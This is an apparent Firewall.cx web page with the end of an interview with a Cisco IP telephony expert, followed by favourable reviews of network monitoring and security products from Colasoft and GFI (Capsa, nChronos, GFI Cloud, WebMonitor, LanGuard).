Q8. At Firewall.cx, we are eagerly looking forward to our liaison with you, as a CCIE and as an expert on Cisco IP Telephony. To all our readers and members, what would be your message for all those who want to trace your footsteps towards a career in Cisco IP Telephony?

I started in IT industry almost a decade ago with Linksys support (a division of Cisco Systems). Then I worked with Cisco TAC for a couple of years in the security and AVVID teams, which gave me a real view and feel of things from both security and telephony domains. After Cisco TAC I joined the Cisco Advanced Services (AS) team where I was responsible for Cisco’s UC and security portfolio for customer facing projects. From thereon I managed a team of consultants. On the way I did CCNA, CCVP, CCSP, CCDP, and many other Cisco specialist certifications to enhance my knowledge and worked towards my first CCIE which was in Voice and my second CCIE which was in Security. I am a co-lead of Cisco AS UC Security Tiger Team and have been working on a ton of UC Security projects, consulting assignments, workshops, knowledge transfer sessions, and so on.

It’s almost two years ago when I decided to write a book on the very subject of my interest that is – UC/IP Telephony security. As I mentioned earlier in this interview, I felt there was a dire need of a title which could bridge the otherwise prominent gap between UC and Security domains.

My advice to anyone who wishes to make his/her career into Cisco IP Telephony domain is, ensure your basics are strong as the product may change and morph forms however, the basics will always remain the same. Always be honest with yourself and do what it takes to ensure that you complete your work/assignment – keeping in mind the balance between your professional and personal life. Lastly, do self-training or get training from Cisco/Partners on new products or services to ensure you are keeping up with the trends and changes in Cisco’s collaboration portfolio.

  • Hits: 34733

Software Review: Colasoft Capsa 7 Enterprise Network Analyzer

Reviewer: Arani Mukherjee

review-100-percent-badgeColasoft Capsa 7.2.1 Network Analyser was reviewed by Firewall.cx a bit more than a year ago. In a year Colasoft has managed to bring in the latest version of the Analyser software i.e. Version 7.6.1.

As a packet analyser, Colasoft Capsa Enterprise has already collected many accolades from many users and businesses, so I would refrain from turning this latest review into a comparison between the two versions. Since Colasoft has made the effort to give us a new version of a well established software, it’s only fair that I perform the review in light of the latest software. This only goes to prove that the new software is not just an upgraded version of the old one, but a heavy weight analyser in its own right.

capsa enterprise v7.1 review

As an effective packet analyser, the various functions performed are: detecting network issues; intrusion and misuse; isolating network problems; monitoring bandwidth; usage; data in motion; end point security and server as a day to day primary data source for network monitoring and management. Capsa is one of the most well known packet analysers available for use today and the reasons it occupies such an enviable position in the networking world are its simplicity in deployment, usage, and data representation. Let’s now put Capsa under the magnifying glass to have a better understanding of why it’s one of the best you can get.

colasoft Capsa enterprise traffic chart

Installing Colasoft Capsa Enterprise

I have mentioned before that I will not use this as an opportunity for comparison between the two versions. However, I must admit, Capsa has retained all the merits displayed in the older version. This is a welcome change as often I have witnessed newer versions of software suddenly abandoning certain features just after all the users have got used to it. So in light of that, the first thing notable is the ease of installation of the software. It was painless from the time you download the full version or the demo copy til you put in the license key information and activate it online. There are other ways of activating it but as a network manager why would someone install a packet analyser on a machine which does not have any network connection.

It takes 5-7 minutes to get the software up and running to a point where you can start collecting data about your network. It carries all the hallmarks of a seamless easy installation and deployment and for all of us, one less thing to worry about. Bearing in mind some of you might find an adhoc review of this software already done while Colasoft’s nChronos Server was being reviewed, I will try not to repeat myself.

Using Capsa Enterprise

You will be greeted with a non cluttered well designed front screen as displayed below.

The default view is the first tab called Dashboard. One you have selected which adapter you want to monitor, and you can have several sessions based on what you do, you hit the ‘Start’ button to start collecting data. The Dashboard then starts coming up with data as it is being gathered. The next screenshot shows what your dashboard will end up looking like:

packet sniffing main console traffic analyzer

Every tab on this software will display data based on what you want to see. In the Node Explorer on the left you can select either a full analysis or particular analysis based on either protocol, the physical nodes or IP nodes.

The Total Traffic Graph is a live progressing chart which can update its display as fast as 1 second, or as slow as up to 1 hour. If you don’t fancy the progressing line graph, you can ponder the bar chart at the bottom. For your benefit you can pause the live flow of the graph by right clicking and selecting ‘Pause Refresh’, as show below:

capsa enterprise main interface

The toolbar at the top needs particular mention because of the features it provides. My favourite was obviously the Utilisation and PPS meters. I forced a download from an FTP site and captured how the needles reacted. Also note the traffic chart which captured bytes per second. The needle position updated every 1 second:

colasoft capsa traffic

The Summary tab is there to provide the user with a full statistical analysis of the network traffic. The separated sections are self explanatory and do provide in-depth meta data.

The Diagnosis tab is of particular interest. It gives a full range view of what’s happening to the data in the network in terms of issues encountered:

capsa enterprise protocol diagnosis

The diagnosis is separated in terms of the actual layers, severity and event description. This I found to be very useful when defining the health of my network.

The Protocol tab gave me a ringside view of the protocols that were topping the list and what was responsible for what chunk of data flowing through the network. I deemed it useful when I wanted to find out who’s been downloading too much using FTP, or who has set up a simultaneous ping test of a node.

Physical and IP Endpoints tabs showed data conversations happening between the various nodes in my network. I actually used this feature to isolate two nodes which were responsible for a sizeable chunk of the network traffic within a LAN. A feature I’m sure network managers will find useful.

Physical, IP, TCP, and UDP Conversations is purely an expanded form of the info provided at the bottom of the previous two tabs.

My favourite tab was the Matrix. Not because of just the name but because of what it displayed. Every data transfer and its corresponding links were mapped based on IP nodes, Physical nodes. You also have the luxury of only seeing the top 100 in the above categories. Here’s a screenshot of my network in full bloom, the top 100 physical conversations:

colasoft capsa matrix analysis

The best display for me was when I selected Top 100 IPv4 Conversations and hovered the mouse over one particular conversation. Not only did Capsa tell me how many peers it was conversing with, it also showed me how many packets were received and sent:

review-capsa-enterprisev7-7

Further on the Packet tab is quite self explanatory. It shows every packet spliced up into its various protocol and encapsulation based components. This is one bit that definitely makes me feel like a Crime Scene Investigator, a feeling I also had while reviewing nChronos. I also sensed that this also helps in terms of understanding how a packet is built, and transferred across a network. Here’s a screenshot of one such packet:

capsa enterprise packet view

As shown above, the level of detail is exhaustive. I wish I’d had this tool when I was learning about packets and their structure. This would have made my learning experience a bit more pleasurable.

All of this is just under the Analysis section. Under the Tools section, you will find very useful applications like the Ping and the MAC Scanner. For me, the MAC Scanner was very useful as I could take a snapshot of all MAC addresses and then be able to compare any changes at a later date. This is useful if there is a change in any address and you are not aware of it. It could be anything from a network card change to a new node being added without you knowing.

I was pleasantly surprised about the level of flexibility of this software when it came to how you wish to see the data. There is the option to have your own charts, add filters against protocols to ignore data that is not important, create alarm conditions which will notify if a threshold is broken or met. A key feature for me was to be able to store packet data and then play it later on using the Packet Player, another nice tool in the Tools section. This historical lookup facility is essential for any comparison that needs be performed after a network issue has been dealt with.

Summary

I have worked with several packet or network analysers and I have to admit Capsa Enterprise captures data and displays it in the best way I have seen. My previous experiences were marred by features that were absent and features that didn’t work or deliver the expected outcome. Colasoft has done a brilliant job of delivering Capsa which meets all my expectations. This software is not only helpful for the network managers but also for students of computer networking. I definitely would have benefitted from Capsa had I known about it back then, but I have now. This tool puts network managers more in control of their networks and gives them that much needed edge for data interpretation. I would tag it with a ‘Highly Recommended’ logo.

 

  • Hits: 28897

Cloud-based Network Monitoring: The New Paradigm - GFI Free eBook

review-gfi-first-aid-kit-1GFI has once again managed to make a difference: They recently published a free eBook named "Cloud-based network monitoring: The new paradigm" as part of their GFI Cloud offerings.

IT managers face numerous challenges when deploying and managing  applications across their network infrastructure. Cloud computing and cloud-based services are the way forward.

This 28 page eBook covers a number of important key-topics which include:

  • Traditional Network Management
  • Cloud-based Network Monitoring: The new Paradigm
  • Big Challenges for Small Businesses
  • A Stronger Defense
  • How to Plan Ahead
  • Overcoming SMB Pain Points
  • The Best Toold for SMB's
  • ...and much more!

This eBook is no longer offered by the vendor. Please visit our Security Article section to gain access to similar articles.

  • Hits: 13635

GFI Network Server Monitor Online Review - Road Test

Reviewer: Alan Drury

review-100-percent-badgeThere’s a lot of talk about ‘the cloud’ these days, so we were intrigued when we were asked to review GFI’s new Cloud offering. Cloud-based solutions have the potential to revolutionise the way we work and make our lives easier, but can reality live up to the hype? Is the future as cloudy as the pundits say? Read on and find out.

What is GFI Cloud?

GFI Cloud is a new service from GFI that provides anti-virus (VIPRE) and workstation/server condition monitoring (Network Server Monitor Online) via the internet. Basically you sign up for GFI Cloud, buy licenses for the services you want and then deploy them to your internet-connected machines no matter where they are. Once that’s done, as long as you have a PC with a web browser you can monitor and control them from anywhere.

In this review we looked at GFI Network Server Monitor Online, but obviously to do that we had to sign up for GFI Cloud first.

Installation of GFI Network Server Monitor Online

Installation is quick and easy; so easy in fact that there’s no good reason for not giving this product a try. The whole installation, from signing up for our free 30-day trial to monitoring our first PC, took barely ten minutes.

To get started, simply follow the link from the GFI Cloud product page and fill in your details:

gfi-network-server-monitor-cloud-1

Next choose the service you’re interested in. We chose Network Server Monitor Online:

gfi-network-server-monitor-cloud-2

Then, after accepting the license agreement, you download and run the installer and that’s pretty much it:

gfi-network-server-monitor-cloud-3

Your selected GFI Cloud products are then automatically monitoring your first machine – how cool is that?

Below is a screenshot of the GFI Cloud desktop. The buttons down the left-hand side and the menu bar across the top let you view the output from either Server Monitor or VIPRE antivirus or, as shown here, you can have a status overview of your whole estate.

gfi-network-server-monitor-cloud-4

We’ve only got one machine set up here but we did add more, and a really useful touch is that machines with problems always float to the top so you need never be afraid of missing something. There’s a handy Filters box through which you can narrow down your view if required. You can add more machines and vary the services running on them, but we’ll come to that later. First let’s have a closer look at Network Server Monitor Online.

How Does It Work?

Network Server Monitor Online uses the GFI Cloud agent installed on each machine to run a series of health checks and report the results. The checks are automatically selected based on the type of machine and its OS. Here’s just a sample of those it applied to our tired XP laptop:

As well as the basics like free space on each of the volumes there’s a set of comprehensive checks to make sure the essential Windows services are running, checks for nasties being reported in the event logs and even a watch on the SMART status of the hard disk.

If these aren’t enough you can add your own similar checks and, usefully, a backup check:

gfi-network-server-monitor-cloud-6

This really is nice – the product supports lots of mainstream backup suites and will integrate with the software to check for successful completion of whatever backup regime you’ve set up. If you’re monitoring a server then that onerous daily backup check is instantly a thing of the past.

As well as reporting into the GFI Cloud desktop each check can email you or, if you add your number to your cloud profile, send you an SMS text alert. So now you can relax on your sun lounger and sip your beer safe in the knowledge that if your phone’s quiet then all is well back at the office.

Adding More Machines To GFI Network Server Monitor Online

gfi-network-server-monitor-cloud-7

Adding more machines is a two-step process. First you need to download the agent installer and run it on the machine in question. There’s no need to login - it knows who you are so you can do a silent push installation and everything will be fine. GFI Cloud can also create a group policy installer for installation on multiple workstations and servers. On our XP machine the agent only took 11k of RAM and there was no noticeable performance impact on any of the machines we tested.

Once the agent’s running the second step is to select the cloud service(s) you want to apply:

gfi-network-server-monitor-cloud-8

When you sign up for GFI cloud you purchase a pool of licenses and applying one to a machine is as simple as ticking a box and almost as quick – our chosen product was up and running on the target machine in less than a minute.

This approach gives you amazing flexibility. You can add services to and remove them from your machines whenever you like, making sure that every one of your purchased licenses is working for you. It’s also scalable – you choose how many licenses to buy so you can start small and add more as you grow. Taking the license off a machine doesn’t remove it from GFI Cloud (it just stops the service) so you can easily put it back again, and if a machine is ever lost or scrapped you can retrieve its licenses and use them somewhere else. Quite simply, you’re in control.

Other Features

Officially this review is about Network Server Monitor Online, but by adding a machine into GFI Cloud you also get a comprehensive hardware and software audit. This is quite useful in itself but when coupled with Network Server Monitor Online it tells you almost everything you need to know:

gfi-network-server-monitor-cloud-9

On top of this you can reboot machines remotely and see at a glance which machines have been shut down or, more ominously, are supposed to be up but aren’t talking to the cloud.

The whole thing is very easy to use but should you need it the documentation is excellent and you can even download a free e-book to help you on your way.

In Conclusion

What GFI has done here is simply brilliant. For a price that even the smallest organisation can afford you get the kind of monitoring, auditing and alerting that you know you need but think you don’t have the budget for. Because it’s cloud-based it’s also a godsend for those with numerous locations or lots of home-workers and road warriors. The low up-front cost and the flexible, scalable, pay-as-you-go licensing should please even the most hard-bitten financial director. And because it’s so easy to use it can sit there working for you in the background while you get on with other things.

Could it be improved? Yes, but even as it stands this is a solid product that brings reliable and useful monitoring, auditing and alerting within the reach of those who can’t justify the expense of dedicated servers and costly software. GFI is on a winner here, and for that reason we’re giving GFI Cloud and GFI Network Server Monitor Online the coveted Firewall.cx ten-out-of-ten award.

  • Hits: 16906

Colasoft: nChronos v3 Server and Console Review

Reviewer: Arani Mukherjee

review-100-percent-badgenChronos, a product of Colasoft, is one of the cutting edge packet/network analysers that the market has to offer today. What we have been promised by Colosoft through their creation is an end to end, round the clock packet analysis, coupled with historical network analysis. nChronos provides an enterprise network management platform which enables users to troubleshoot, diagnose  and address network security and performance issues. It also allows retrospective network analysis and, as stated by Colasoft, will “provide forensic analysis and mitigate security risks”. Predictably it is a must have for anyone involved with network management and security.

Packet analysis has been in the forefront for a while, for the purposes of network analysis; detection of network intrusion; detect misuse; isolate exploited systems; monitor network usage; bandwidth usage; endpoint security status; verify adds, moves and changes and various other such needs. There are quite a few players in this field and, for me, it does boil down to some key unique selling points. I will lay out the assessment using criteria like ease of installation, ease of use, unique selling points and, based on all of the aforementioned, how it stacks up against competition.

Ease of Installation - nChronos Installation

The installation instructions for both nChronos Server and console are straightforward. You install the server first, followed by the console. Setting up the server was easy enough. The only snag that I encountered was when I tried to log onto the server for the first time. The shortcut created by default runs the web interface using the default web browser. However, it calls ‘localhost’ as the primary link for the server. That would bring up the default web page of the physical server on which nChronos server was installed. I was a bit confused when the home page of my web server came up instead of what I was expecting. But one look into the online help files and the reference on this topic said to try ‘localhost:81’ as an option and, if that doesn’t work, try ‘localhost:82’. The first option worked straight away, so I promptly changed the shortcut of nChronos server to point to ‘localhost:81’. Voilà, all was good. Rest of the configuration was extremely smooth, and the run of events followed exactly what was said in the instruction manual. For some reason at the end of the process the nChronos server is meant to restart. If by any chance you receive an error message in the lines of the server not being able to restart, it’s possibly a glitch. The server restarted just fine, as I found out later. I went ahead to try the various installation scenarios mentioned and all of them worked just as fine.

Once the server was up and running, I proceeded to install the nChronos Console, which was also straightforward. It worked the first time, every time. With the least effort I was able to link up the console with the server and start checking out the console features. And yes, don’t forget to turn the monitoring on for the network interfaces you need to manage. You can do that either from the server or from the console itself. So all in all, the installation process passed with some high grades.

Ease Of Use

Just before starting to use the software I was getting a bit apprehensive about what I needed to include in this section. First I thought I would go through the explanation of how the software works and elaborate on the technologies used to render the functionalities provided. But then it occurred to me that it would be redundant for me to expand on all of that because this is specialist software. The users of this type of software are already aware of what happens in the background and are well versed with the technicalities of the features. I decided to concentrate on how effectively this software helps me perform the role of network management, packet tracing and attending to issues related to network security.

The layout of the nChronos Server is very simple and I totally agree with Colasoft’s approach of a no nonsense interface. You could have bells and whistles added but they would only enhance the cosmetic aspect of the software, adding little or nothing to its function.

colasoft nchronos server administrationThe screenshot above gives you an idea of what the Server Administration page looks like, which is the first page that would open up once the user has logged in. This is the System Information page. On the left pane you will find several other pages to look at i.e. Basic Settings which displays default port info and HDD info of the host machine, User Account (name says it all), and Audit Log (which will basically show the audit trail of user activity.)

The interesting page to look at is Network Link. This is where the actual interfaces to be monitored are added. The screenshot below shows this page:

colasoft nchronos network link

Obviously for the purpose of this review the only NIC registered on the server was the NIC of my own machine. This is the page from where you can start monitoring of the various network interfaces all over your network. Packet data for any NIC would not be captured if you haven’t clicked on the ‘Start’ button for the specific NIC. So don’t go about blaming the car not starting up when you haven’t even turned the ignition key!!!

All in all, it’s simple and it’s effective as it gives you less chances of making any errors.

Now that the server is all up and running we use the nChronos Console to peer into the data that it is capturing:

colasoft nchronos network console

The above screenshot shows the console interface. For the sake of simplicity I have labelled three separate zones, 1, 2, and 3. When the user logs in the for first time, he/she has to select the interface that needs to be looked at from zone 2 and click on the ‘Open’ button. That then shows all the details about that interface in Zones 1 and 3. Notice in Zone 1 there is a strip of buttons, one of which is the auto–scroll feature. I loved this feature as it helps you the see traffic as it passes through. To see a more detailed data analysis you simply click drag and release the mouse button to select a time frame. This unleashes a spectrum of relevant information in Zone 3. Each and every tab displays the packets captured through a category window, e.g. The application tab will show the types of application protocols have been used in that time frame i.e. HTTP, POP, etc.

One of the best features I found was the ability to parse each line of data under any tab by just double clicking on it. So if I double clicked the link on the application tab that says HTTP, it would drill down to IP Address. I can keep on drilling down and it would traverse from HTTP IP AddressIP ConversationTCP Conversation. I can jump to any specific drill down state by right clicking on the application protocol itself and making a choice on the right click menu. This is a very useful feature. For the more curious, the little spikes in traffic in zone 1 was my mail application checking for new mail every 5 seconds.

The magic happens when you right click on any line of data and select ‘Analyse Packet’. This invokes the nChronos Analyzer:

colasoft nchronos packet analyzer

The above screenshot shows what the Analyzer looks like by default. This was by far my favourite tool. The way the information about the packets was shown was just beyond belief. This is one example where Colasoft has shown one of its many strengths, where it can combine flamboyance with function. The list of tabs on the top will give you an idea of how many ways the Analyzer can show you the data you want to see. Some of my favourites were the following: Protocol

colasoft nchronos analysis

This is a screenshot of the Protocol Tab. I was impressed with seeing the number of column headers that were being used to show detailed information about the packets. The tree-like expanded way of showing protocols under particular data units, based on the layers involved, was useful.

Another one of my favourite tabs was the Matrix:

colasoft nchronos network matrix

The utility of this tab is to show the top 100 end to end conversions which can be IP conversions, physical conversions etc. If you double click any of those lines denoting a conversion it opens up an actual data exchange between the nodes. This is very important for a network manager if there is a need to decipher what exact communication was ensuing between to nodes, be it physical or IP, for a given point of time. It can be helpful in terms of checking network abuse, intrusions etc.

This brings me to my most favourite tab of all, the Packet tab. This tab will show you end to end data being exchanged between any two interfaces and show you exactly what data was being exchanged. I know most packet analyzers primary function is to be able to do that but I like Colasoft’s treatment of this functionality:

colasoft nchronos packet analysis

I took the liberty of breaking up the screen into three zones to show how easy it was to delve into any packet. In zone 1, you would select exactly which interchange of data between any concerned nodes you want to splice. Once you have done that, zone 2 starts showing the packet structure in terms of the difference network protocols i.e. Data link layer, Network Layer, Transport Layer, Application Layer etc. Then zone 3 shows you the actual data that was encapsulated inside that specific packet. This is by far the most lucid and practical approach I have seen by any packet analyzer software when showing encapsulated data within packets. I kid you not, I have seen many packet analyzers and Colasoft trumps the lot.

Summary

Colasoft’s unique selling points will always remain simplicity, careful positioning of features to facilitate easy access for users, presentation of data in a non–messy way for maximum usage and, specially for me, making me feel like a Crime Scene Investigator of networks, like you might see on CSI–Las Vegas (apologies to anyone who is hasn’t seen the CSI series).

Network security has become of paramount importance to us in our daily lives as more and more civil, military and scientific work and facilities are becoming dependant on networks. For a network administrator it is not only important to resume normalcy of network operations as soon as possible but also to go back and investigate successfully why an event, capable of crippling a network, might have happened in the first place. This is also applicable in terms of preventing such a disruptive event.

Colasoft’s nChronos Server and Console coupled with Analyzer is an assorted bundle of efficient software which helps to perform all the function required to preserve network integrity and security. It is easy to setup and maintain, requires minimum intervention when it’s working and delivers vast amounts of important information in the easiest manner possible. This software bundle is a must-have for any organisation which, for all the right reasons, values its network infrastructure highly, and wants to preserve its integrity and security.

  • Hits: 18103

GFI WebMonitor 2012 Internet Web Proxy Review

Review by Alan Drury and John Watters

review-badge-98The Internet connection is vital for many Small to Medium or Large-sized enterprises, but it can also be one of the biggest headaches. How can you know who is doing what? How can you enforce a usage policy? And how can you protect your organisation against internet-borne threats? Larger companies tend to have sophisticated firewalls and border protection devices, but how do you protect yourself when your budget won’t run to such hardware? This is precisely the niche GFI has addressed with GFI WebMonitor.

How Does GFI WebMonitor 2012 Work?

Before we get into the review proper it’s worth taking a few moments to understand how it works. GFI WebMonitor installs onto one of your servers and sets itself up there as an internet proxy. You then point all your browsers to the internet via that proxy and voilà – instant monitoring and control.

The server you choose doesn’t have to be internet-facing or even dual-homed (although it can be), but it does obviously need to be big enough and stable enough to become the choke point for all your internet access. Other than that, as long as it can run the product on one of the supported Microsoft Windows Server versions, you’re good to go.

We tested it in a average company that had an adequate amount of PCs, laptops and mobile clients (phones), running on a basic ADSL internet connection and a dual-core Windows 2003 Server box that was doing everything, including being the domain controller and the print server in its spare time, and happily confirmed no performance impact on the server.

Installing GFI WebMonitor 2012

As usual with GFI we downloaded the fully functional 30-day evaluation copy (82Mb) and received the license key minutes later by email. On running the installer we found our humble server lacked several prerequisites but happily the installer went off and collected them without any fuss.

review-gfi-webmonitor2012-1

After that it offered to check for updates to the program, another nice touch:


The next screen is where you decide how you want to implement the product. Having just a single server with a single network card we chose single proxy mode:

review-gfi-webmonitor2012-3

With those choices made the installation itself was surprisingly quick and before long we were looking at this important screen:

review-gfi-webmonitor2012-4

We reconfigured several user PCs to point to our newly-created http proxy and they were able to surf as if nothing had happened. Except, of course, for the fact that we were now in charge!

We fired off a number of web accesses (to www.Firewall.cx of course, among others) and some searches, then clicked Finish to see what the management console would give us.

WebMonitor 2012 - The All-Seeing Eye

The dashboard overview (above) displays a wealth of information. At a glance you can see the number of sites visited and blocked along with the top users, top domains and top categories (more on these later).  There’s also a useful trending graph which fills up over time, and you can change the period being covered by the various displays using the controls in the top right-hand corner. The console is also web-based so you can use it remotely.

review-gfi-webmonitor2012-5Many of the displays are clickable allowing you to easily drill down into the data, and if you hover the mouse you’ll get handy pop-up explanations. We were able to go from the overview to the detailed activities of an individual user with just a few clicks. A user here is a single source IP, in other words a particular PC rather that the person using it. Ideally we would have liked the product to query the Active Directory domain controller and nail down the actual logged-on user but to be honest given the reasonable price and the product’s undoubted usefulness we’re not going to quibble.

The other dashboard tabs help you focus on particular aspects. The Bandwidth tab (shown below) and the activity tab let you trend the activity either by data throughput or the number of sessions as well as giving you peaks, totals and future projections. The real-time traffic tab shows all the sessions happening right now and lets you kill them, and the quarantine tab lists the internet nasties that WebMonitor has blocked.

review-gfi-webmonitor2012-6

To the right of the dashboard, the reports section offers three pages of ad-hoc and scheduled reports that you can either view interactively or have emailed to you. You can pretty much get anything here: the bandwidth wasted by non-productive surfing during a time period; the use of social networking sites and/or webmail; the search engine activity; the detailed activity of a particular user and even the use of job search websites on company time.

review-gfi-webmonitor2012-7

Underlying all this is a huge database of site categories. This, along with the malware protection, is maintained by GFI and downloaded daily by the product as part of your licensed support so you’ll need to stay on support moving forward if you want this to remain up to date.

The Enforcer

Monitoring, however, is only half the story and it’s under the settings section that things really get interesting.  Here you can configure the proxy (it can handle https if you give it a certificate and it also offers a cache) and a variety of general settings but it’s the policies and alerts that let you control what you’ve been monitoring.

review-gfi-webmonitor2012-8

By defining policies you can restrict or allow all sorts of things, from downloading to instant messaging to categories of sites allowed or blocked and any time restrictions. Apply the relevant policies to the appropriate users and there you go.

The policies are quite detailed. For example, here’s the page allowing you to customise the default download policy. Using the scrolling list you can restrict a range of executables, audio/video files, document types and web scripts and if the default rules don’t meet your needs you can create your own. You can block them, quarantine them and generate an alert if anyone tries to do what you’ve forbidden.

review-gfi-webmonitor2012-9

Also, hidden away under the security heading is the virus scanning policy. This is really nice - GFI WebMonitor can scan incoming files for you using several anti-virus, spyware and malware detectors and will keep these up to date. This is the part of the program that generates the list of blocked nasties we mentioned earlier.

Pull down the monitoring list and you can set up a range of administrator alerts ranging from excessive bandwidth through attempted malware attacks to various types of policy transgression. By using the policies and alerts together you can block, educate or simply monitor across the whole spectrum of internet activity as you see fit.

review-gfi-webmonitor2012-10

Final Thoughts

GFI WebMonitor is a well thought-out, thoughtfully focussed and well integrated product that provides everything a small to large-sized enterprise needs to monitor and control internet access at a reasonable price. You can try it for free and the per-seat licensing model means you can scale it as required. It comes with great documentation both for reference and to guide you as you begin to take control.

 

  • Hits: 23664

Product Review - GFI LanGuard Network Security Scanner 2011

review-gfi-languard2011-badge
Review by Alan Drury and John Watters

Introduction

With LanGuard 2011 GFI has left behind its old numbering system (this would have been Version 10), perhaps in an effort to tell us that this product has now matured into a stable and enterprise-ready contender worthy of  serious consideration by small and medium-sized companies everywhere.

Well, after reviewing it we have to agree.

In terms of added features the changes here aren’t as dramatic as they were between say Versions 8 and 9, but what GFI have done is to really consolidate everything that LanGuard already did so well, and the result is a product that is rock-solid, does everything that it says on the tin and is so well designed that it’s a joy to use.

Installation

As usual for GFI we downloaded the fully-functional evaluation copy (124Mb) from its website and received our 30-day trial licence by email shortly afterwards. Permanent licences are reasonably priced and on a sliding scale that gets cheaper the more target IP addresses you want to scan. You can discover all the targets in your enterprise but you can only scan the number you’re licensed for.

Installation is easy. After selecting your language your system is checked to make sure it’s up to the job:

review-gfi-languard-2011-1
The installer will download and install anything you’re missing but it’s worth noting that if you’re on a secure network with no internet access then you’ll have to get them yourself.

Once your licence is in place the next important detail is the user account and password LanGuard will use to access and patch your machines. We’d suggest a domain account with administrator privileges to ensure everything runs smoothly across your whole estate. And, as far as installation goes, that’s pretty much it.

Scanning

LanGuard opened automatically after installation and we were delighted to find it already scanning our host machine:

review-gfi-languard-2011-2

The home screen (above) shows just how easy LanGuard is to use. All the real-world tasks you’ll need to do are logically and simply accessible and that’s the case all the way through. Don’t be deceived, though; just because this product is well-designed doesn’t mean it isn’t also well endowed.

Here’s the first treasure – as well as scanning and patching multiple versions of your Windows OS’s LanGuard 2011 interfaces with other security-significant programs. Here it is berating us for our archaic versions of Flash Player, Java, QuickTime and Skype:

review-gfi-languard-2011-3

This means you can take, from just one tool, a holistic view of the overall security of your desktop estate rather than just a narrow check of whether or not you have the latest Windows service packs. Anti-virus out of date? LanGuard will tell you. Die-hard user still on an older browser? You’ll know. And you can do something about it.

Remediation

Not only will LanGuard tell you what’s missing, if you click on Remediate down in the bottom right of the screen you can ask the product to go off and fix it. And yes, that includes the Java, antivirus, flash player and everything else:

review-gfi-languard-2011-4

Want to deploy some of the patches but not all? No problem. And would you like it to happen during the dark hours? LanGuard can do that too, automatically waking up the machines, shutting them down again and emailing you with the result. Goodness, we might even start to enjoy our job!

LanGuard can auto-download patches, holding them ready for use like a Windows SUS server, or it can go and get them on demand. We just clicked Remediate and off it went, downloaded our updated Adobe AIR and installed it without any fuss and in just a couple of minutes.

Agents and Reports

Previous versions of LanGuard were ‘agentless’, with the central machine scanning, patching and maintaining your desktop estate over the network. This was fine but it limited the throughput and hence what could be achieved in a night’s work. While you can still use it like this, LanGuard 2011 also introduces a powerful agent-based mode. Install the agent on your PCs (it supports all the current versions of Windows) and they will do the work while your central LanGuard server merely gives the orders and collects the results. The agents give you a lot of power; you can push-install them without having to visit every machine, and even if a laptop strays off the network for a while its agent will report in when it comes back. This is what you’d expect from a scalable, enterprise-credible product and LanGuard delivers it in style.

The reports on offer are comprehensive and nicely presented. Whether you just want a few pie charts to convince your boss of the value of your investment or you need documentary evidence to demonstrate PCI DSS compliance, you’ll find it here:

review-gfi-languard-2011-5

A particularly nice touch is the baseline comparison report; you define one machine as your baseline and LanGuard will then show you how your other PCs compare to it, what’s missing and/or different:

review-gfi-languard-2011-6

Other Features

What else can this thing do? Well there’s so much it’s hard to pick out the best points without exceeding our word limit, but here are a few of our favourites:

  • A comprehensive hardware audit of all the machines in your estate, updated regularly and automatically, including details of the removable USB devices that have been used
  • An equally comprehensive and automatic software audit, broken down into useful drag-and-drop categories, so you’ll always know exactly who has what installed. And this doesn’t just cover applications but all the stuff like Java, flash, antivirus and antispyware as well
  • The ability to define programs and applications as unauthorised, which in turn allows LanGuard to tell you where they are installed, alert you if they get installed and – oh joy, automatically remove them from the user’s machines
  • System reports including things like the Windows version, shared drives, processes, services and local users and groups including who logged on and when
  • Vulnerability reports ranging from basic details like open network ports to detected vulnerabilities with their corresponding OVAL and CVE references and hyperlinks for further information
  • A page of useful tools including SNMP walk, DNS lookup and enumeration utilities

Conclusion

We really liked this product. If you have a shop full of Windows desktops to support and you want complete visibility and control over all aspects of their security from just one tool then LanGuard 2011 is well worth a look. The real-world benefits of a tool like this are undeniable, but the beauty of LanGuard 2011 is in the way those benefits are delivered. GFI has drawn together all the elements of this complicated and important task into one seamless, intuitive and comprehensive whole and left nothing out, which is why we’ve given LanGuard 2011 the coveted Firewall.cx 10/10 award.

 

  • Hits: 27885

GFI Languard Network Security Scanner V9 Review

With Version 9, GFI's Network Security Scanner has finally come of age. GFI has focussed the product on its core benefit – maintaining the security of the Windows enterprise – and the result is a powerful application that offers real benefits for the time-pressed network administrator.

Keeping abreast of the latest Microsoft patches and Service Packs, regular vulnerability scanning, corrective actions, software audit and enforcement in a challenging environment can really soak up your time. Not any more though – install Network Security Scanner and you can sit back while all this and more happens automatically across your entire estate.

The user interface for Version 9 is excellent; so intuitive in fact that we didn't touch the documentation at all yet managed all of the product's features. Each screen leads you to the next so effectively that you barely need to think about what you are doing and using the product quickly becomes second nature.

Version 8 was good, but with Version 9 GFI has done it again.

Installation

Installation is straightforward. All the software needs is an account to run under, details of its back-end database and a location to reside. MS Access, MSDE or MS SQL Server databases are supported and you can even migrate your data from one to another if needs be.

The Interface

The separate toolbar scheduler from Version 8 is gone and, in its place, the opening screen gives you all the options you need: Scan this Computer, Scan the Network, Custom Scan or Scheduled Scan. Click ‘Scan this Computer' and the scan begins – just one simple mouse click and you're off.

reviews-gfi-languard-v9-1

Performance and Results

Scanning speed is just as good as Version 8 and in less than two minutes we had a summary of the results:

reviews-gfi-languard-v9-2

Simply look below the results summary and the handy Next Steps box (with amusing typographical error) leads you through the process of dealing with them.

The prospect of Analizing the results made our eyes water so, having taken care to protect our anatomy from any such unwarranted incursion, we clicked the link:

reviews-gfi-languard-v9-3

The scan results are grouped by category in the left column with details to the right. Expand the categories and you get a wealth of information.

The vulnerabilities themselves are described in detail with reference numbers and URLs to lead you to further resources, but that's not all. You also get the patch status of the scanned system, a list of open ports, a comprehensive hardware report, an inventory of the installed software and a system summary. Think of all this in terms of your enterprise – if you have this product scanning all your machines you can answer questions such as “Which machines are still on Service Pack 2?” or “How much memory is in each of the Sales PCs?” or “What software does Simon have installed on his laptop?” without going anywhere else. It's all there for you at the click of a mouse.

There are other gems here as well, too many to list but here are some of our favourites. Under Potential Vulnerabilities the scanner lists all the USB devices that had been connected so we could monitor the historical use of memory sticks and the like. And the software audit, useful in itself, held another delight. Right click on any software entry and you can tell the scanner to uninstall it, either from just this machine or from all the machines in the network. Go further and define a list of banned applications and the product will remove them for you, automatically, when it runs its regular scan. Imagine the face of that wayward user each morning …

Patch Deployment

Choose the Remediate link and you'll head off to the part of the product that installs patches and service packs. Needless to say, these can be downloaded for you from Microsoft as they are released and held by the product, ready for use:

reviews-gfi-languard-v9-4

